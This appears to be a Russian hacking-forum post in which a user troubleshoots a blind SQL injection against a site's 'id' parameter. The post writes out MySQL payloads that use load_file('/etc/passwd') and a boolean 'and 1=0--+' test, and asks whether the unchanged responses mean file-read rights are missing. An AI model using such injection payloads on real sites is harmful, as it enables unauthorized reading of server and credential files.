Показать сообщение отдельно

  #12  
Старый 11.08.2015, 11:49
3nvY
Познающий
Регистрация: 08.06.2015
Сообщений: 50
С нами: 5753846

Репутация: 11
По умолчанию

Проверяю данные запросы в консоли

SELECT 1 AND 1=if(load_file('/etc/passwd') is not NULL,1,2); Возвращает 1.

SELECT 1 AND 1=if(load_file('/etc/passwd') is NULL,1,2); Возвращает 0.

Но когда подставляю на сайте что в первом, что во втором случае отображается то же самое, что и при: site.ru/index.php?id=1

Но если делаю так: site.ru/index.php?id=1 and 1=0--+

Возвращает пустую страницу.

Это значит что нет прав на загрузку файла?

Может я что-то делаю не так?=\
 
Ответить с цитированием